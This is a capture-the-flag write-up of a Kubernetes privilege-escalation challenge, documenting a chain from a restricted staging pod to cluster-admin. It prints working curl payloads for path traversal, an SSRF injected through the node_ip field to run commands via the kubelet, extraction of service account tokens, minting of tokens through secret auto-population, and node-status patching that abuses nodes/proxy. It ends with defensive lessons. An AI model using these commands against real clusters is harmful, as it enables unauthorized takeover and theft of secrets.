Game of Pods CTF: Kubernetes Privilege Escalation - Complete Technical Writeup
Challenge Overview
This writeup documents the complete exploitation chain for the "Game of Pods" Kubernetes CTF challenge. The challenge required escalating from minimal permissions in a staging namespace to cluster administrator access, ultimately retrieving a flag stored as a secret in the kube-system namespace.
Duration: October 27 - December 10, 2025 (~6 weeks)
The Final Attack Chain
- Initial access with severely limited RBAC permissions
- Discovery of a vulnerable debugging service (k8s-debug-bridge)
- Path traversal exploitation to bypass namespace restrictions
- SSRF vulnerability discovery via parameter injection
- Service account token extraction via kubelet command execution
- Leveraging Kubernetes secret auto-population behavior
- Node status manipulation to redirect API server traffic
- Cluster-admin access via nodes/proxy privilege escalation
Initial Access
Upon spawning into the challenge environment, we landed in a pod with the following constraints:
Pod: test
Namespace: staging
Service Account: system:serviceaccount:staging:test-sa
Cluster: K3s v1.31.5+k3s1
RBAC Permissions (test-sa)
The service account had extremely limited permissions:
get,list,watchonpodsinstagingnamespace only- No access to secrets, configmaps, or other resources
- No access to other namespaces
Four Cryptic Hints
The challenge provided four hints that guided our exploration:
- "Images tend to live together in herds called registries" - Pointed to container registry credential exploitation
- "I always forget the proper way to construct URLs in Golang. I guess %s will do the trick" - Golang format string vulnerability
- "Creating secrets in k8s can produce surprising results" - Service account token auto-population
- "Kubelet authentication bypass through API Server Proxy" - Reference to CVE-2020-8562 and nodes/proxy exploitation
Phase 1: Reconnaissance
Initial Environment Discovery
We began by mapping the environment:
# Discovered limited permissions
kubectl auth can-i --list
# Examined our pod configuration
kubectl get pod test -n staging -o yaml
# Extracted and decoded service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d. -f2 | base64 -d | jq .
Key findings:
- Node name:
noder - Pod IP:
10.42.0.2 - Service account token with 1-year expiration
- Pod pulling from private Azure Container Registry:
hustlehub.azurecr.io
Registry Exploration
The pod was pulling images from hustlehub.azurecr.io without visible imagePullSecrets in the pod spec. This suggested credentials were stored elsewhere (ServiceAccount or node-level).
Using ORAS (OCI Registry As Storage), we discovered:
- Anonymous pull access worked for some repositories
- Two registries existed:
hustlehub.azurecr.io(public) andmorehustle.azurecr.io(private) - A
flagrepository existed in both registries but required authentication
CVE Research and Initial Exploitation Attempts
We researched CVE-2020-8562, a path traversal vulnerability in the Kubernetes API server's pod proxy feature. This allowed us to access kubelet endpoints:
# Working path traversal pattern
kubectl get --raw '/api/v1/namespaces/staging/pods/test:10250/proxy/../../../pods'
However, RBAC restrictions blocked access to most sensitive endpoints.
Phase 2: Service Discovery
Network Reconnaissance
We performed systematic network scanning to discover cluster services:
# DNS enumeration
nslookup -type=SRV _http._tcp.default.svc.cluster.local
# Port scanning service IP ranges
for i in {1..255}; do
curl -s --max-time 1 http://10.43.1.$i:80 2>&1 | head -1
done
k8s-debug-bridge Discovery
We discovered a debugging service at 10.43.1.168:80 in the app namespace:
# Reverse DNS lookup revealed the service
nslookup 10.43.1.168
# Result: k8s-debug-bridge.app.svc.cluster.local
Source Code Extraction
Using anonymous registry access, we pulled the k8s-debug-bridge container image and extracted its source code:
oras pull hustlehub.azurecr.io/k8s-debug-bridge:latest
# Extracted and decompiled the Go binary
Phase 3: Vulnerability Analysis
Path Traversal in Namespace Validation
Analysis of the k8s-debug-bridge source code revealed a critical vulnerability:
// Vulnerable code - checks wrong path index
func validateNamespace(path string) error {
pathParts := strings.Split(path, "/")
if pathParts[1] != "app" { // BUG: Should check pathParts[2]
return fmt.Errorf("only access to the app namespace is allowed")
}
return nil
}
This allowed path traversal using payloads like app/../kube-system.
Endpoint Mapping
The service exposed two endpoints:
/logs- GET requests to kubelet's containerLogs endpoint/checkpoint- POST requests to kubelet endpoints
Working Exploits
# Access kube-system pod logs via path traversal
curl -X POST http://10.43.1.168:80/logs \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2", "namespace": "app/../kube-system",
"pod": "coredns-ccb96694c-55nwf", "container": "coredns"}'
# List all pods on the node
curl -X POST http://10.43.1.168:80/logs \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2", "namespace": "app",
"pod": "../../pods?", "container": ""}'
Pod Mapping
Through kubelet endpoint access, we identified all pods on the node:
| Pod | Namespace | Service Account |
|---|---|---|
| test | staging | test-sa |
| app-blog | app | app |
| k8s-debug-bridge-xxx | app | k8s-debug-bridge |
| coredns-xxx | kube-system | coredns |
Phase 4: Dead Ends and Failed Approaches
Many approaches didn't work and represented significant time investment:
1. Direct Secret Access via Kubelet
- Kubelet doesn't expose a
/secretsendpoint /logs/endpoint for node filesystem access returned 403 Forbidden
2. Command Execution via /run Endpoint
- Initial attempts to the
/runendpoint returned 405 Method Not Allowed - The endpoint required specific URL construction
3. Format String Exploitation
- Extensive testing of
%s,%v,%din various parameters - While the format string was processed, we couldn't leverage it for data leakage
4. Direct Registry Credential Extraction
- Attempted to read K3s registry configuration files
/etc/rancher/k3s/registries.yamldidn't exist in containers
5. HustleHub Application Exploitation
- Explored the app-blog web application
- Found cookie-based sessions but no credential leakage
6. TokenRequest API
- Attempted to use TokenRequest subresource
- Blocked by RBAC on service account resources
Phase 5: The Breakthrough - SSRF via node_ip Injection
Critical Discovery
We discovered that the node_ip parameter in the /checkpoint endpoint was used unsanitized in URL construction. By injecting path components and using # to truncate the remaining URL, we could access arbitrary kubelet endpoints:
# SSRF payload structure
curl -X POST "http://10.43.1.168:80/checkpoint" \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=<COMMAND>#",
"pod": "x", "namespace": "x", "container": "x"}'
This bypassed the debug bridge's intended functionality and directly accessed kubelet's /run endpoint for command execution.
Service Account Token Extraction
Using the SSRF, we extracted the app service account token from the app-blog pod:
curl -X POST "http://10.43.1.168:80/checkpoint" \
-H "Content-Type: application/json" \
-d '{"node_ip": "172.30.0.2:10250/run/app/app-blog/app-blog?cmd=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token#",
"pod": "x", "namespace": "x", "container": "x"}'
This yielded a valid JWT for system:serviceaccount:app:app.
Phase 6: Privilege Escalation via Secret Auto-Population
Understanding the "Surprising Results"
The third hint referred to a Kubernetes behavior where creating a Secret with:
type: kubernetes.io/service-account-tokenmetadata.annotations["kubernetes.io/service-account.name"]: <target-sa>
Causes Kubernetes to automatically populate the secret with a valid token for that ServiceAccount.
Exploitation
Using the app service account token, we created a secret targeting k8s-debug-bridge:
curl -sk -H "Authorization: Bearer $APP_TOKEN" \
"https://kubernetes.default.svc/api/v1/namespaces/app/secrets" \
-X POST -H "Content-Type: application/json" \
-d '{
"apiVersion": "v1",
"kind": "Secret",
"metadata": {
"name": "pwn-token",
"namespace": "app",
"annotations": {
"kubernetes.io/service-account.name": "k8s-debug-bridge"
}
},
"type": "kubernetes.io/service-account-token"
}'
Kubernetes automatically populated the secret with a valid token for k8s-debug-bridge.
k8s-debug-bridge Permissions
The k8s-debug-bridge service account had significant cluster-level permissions:
get,create,patchonnodes/proxy,nodes/checkpoint,nodes/statusget,list,watchonnodes
Phase 7: Final Escalation - Node Status Manipulation
The nodes/proxy Attack
The fourth hint pointed to a known Kubernetes privilege escalation technique involving nodes/proxy permissions. With nodes/status PATCH permissions, we could manipulate where the API server routes traffic.
Attack Chain
- Patch node status to change the kubelet endpoint port from 10250 to 6443 (API server port)
- Use nodes/proxy - the API server would connect to itself with its own credentials (cluster-admin)
- Access any resource through the proxied connection
Implementation
# Step 1: Get current node status
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/status" > noder-orig.json
# Step 2: Patch port from 10250 to 6443
cat noder-orig.json | sed "s/\"Port\": 10250/\"Port\": 6443/g" > noder-patched.json
# Step 3: Apply the patch
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
-H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@noder-patched.json" \
"https://172.30.0.2:6443/api/v1/nodes/noder/status"
# Step 4: Access secrets via nodes/proxy (API server talks to itself)
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/proxy/api/v1/secrets"
Flag Retrieval
With effective cluster-admin access, we enumerated all secrets:
curl -sk -H "Authorization: Bearer $DEBUG_TOKEN" \
"https://172.30.0.2:6443/api/v1/nodes/noder/proxy/api/v1/namespaces/kube-system/secrets/flag"
Complete Attack Chain Summary
┌─────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. Initial Access: test pod (staging namespace) │
│ │ │
│ ▼ │
│ 2. Discover k8s-debug-bridge service (10.43.1.168:80) │
│ │ │
│ ▼ │
│ 3. Path traversal: app/../kube-system bypasses validation │
│ │ │
│ ▼ │
│ 4. SSRF via node_ip injection with # truncation │
│ │ │
│ ▼ │
│ 5. Extract app SA token via kubelet /run command exec │
│ │ │
│ ▼ │
│ 6. Create SA token secret for k8s-debug-bridge │
│ (Kubernetes auto-populates with valid token) │
│ │ │
│ ▼ │
│ 7. Use nodes/status PATCH to redirect kubelet port to 6443 │
│ │ │
│ ▼ │
│ 8. nodes/proxy → API server connects to itself with │
│ cluster-admin credentials │
│ │ │
│ ▼ │
│ 9. Read flag from kube-system/secrets/flag │
│ │
└─────────────────────────────────────────────────────────────────┘
Technical Details
Tokens Obtained
| Service Account | Namespace | How Obtained |
|---|---|---|
| test-sa | staging | Initial access |
| app | app | SSRF + kubelet /run |
| k8s-debug-bridge | app | Secret auto-population |
Key Vulnerabilities Exploited
| Vulnerability | Description |
|---|---|
| Path Traversal | Incorrect path index validation in k8s-debug-bridge |
| SSRF | Unsanitized node_ip parameter in /checkpoint endpoint |
| Secret Auto-Population | kubernetes.io/service-account-token behavior |
| Node Status Manipulation | nodes/status PATCH + nodes/proxy (NCC-E003660-JAV) |
Tools Used
- kubectl
- curl
- jq
- nmap
- ffuf (endpoint enumeration)
- ORAS (registry access)
- base64
Lessons Learned
What Made This Challenge Difficult
- Layered Security - Multiple barriers required chaining vulnerabilities
- Misdirection - Registry credentials were a red herring (flag was in a secret, not registry)
- Subtle Vulnerabilities - Path index off-by-one and URL truncation with #
- Kubernetes Complexity - Required deep understanding of SA tokens, secrets, and node proxying
Key Insights
- Service account token secrets auto-populate - Powerful primitive for privilege escalation
- nodes/proxy + nodes/status = cluster-admin - Known attack vector documented in K8s security audits
- SSRF in internal services - Often overlooked attack surface in Kubernetes
Security Implications
1. Service Account Token Behavior
The auto-population of service account tokens when creating secrets of type kubernetes.io/service-account-token is a powerful primitive for attackers. Organizations should:
- Restrict
createpermissions on secrets in sensitive namespaces - Use RBAC policies that prevent cross-service account token generation
- Monitor secret creation events for suspicious patterns
2. nodes/proxy Privilege Escalation
The combination of nodes/proxy and nodes/status permissions can lead to cluster compromise:
- Avoid granting these permissions to workload service accounts
- Use admission controllers to detect and block node status manipulation
- Monitor for unusual node configuration changes
3. Internal Service Security
The k8s-debug-bridge service demonstrated multiple security anti-patterns:
- Off-by-one errors in path validation
- Unsanitized user input in URL construction
- Overly permissive service account RBAC
Timeline
| Week | Focus | Key Achievement |
|---|---|---|
| 1 | Initial recon | Mapped environment, discovered registry |
| 2 | CVE research | Path traversal via pod proxy |
| 3 | Service discovery | Found k8s-debug-bridge, extracted source |
| 4 | Vulnerability analysis | Identified path traversal and format string |
| 5 | SSRF exploitation | Extracted app SA token, created debug-bridge token |
| 6 | Final escalation | nodes/proxy attack, retrieved flag |
References and Further Reading
- Kubernetes RBAC Documentation
- Kubernetes Service Account Token Secrets
- NCC Group: Privilege Escalation via nodes/proxy (NCC-E003660-JAV)
- CVE-2020-8562: Kubernetes API Server Path Traversal
Conclusion
This challenge effectively demonstrated the complexity of Kubernetes security and how multiple seemingly minor vulnerabilities can be chained together for complete cluster compromise. The attack path required:
- Deep understanding of Kubernetes internals (RBAC, service accounts, kubelet API)
- Creative exploitation of SSRF and path traversal vulnerabilities
- Knowledge of Kubernetes-specific privilege escalation techniques
- Persistence through multiple dead ends and failed approaches
The key takeaway: Kubernetes' layered architecture of proxies, API servers, and kubelets creates a complex web where a single misconfiguration can cascade into full cluster compromise.
Challenge created by Yuval Avrahami as part of The Ultimate Cloud Security Championship by Wiz. Writeup completed: December 10, 2025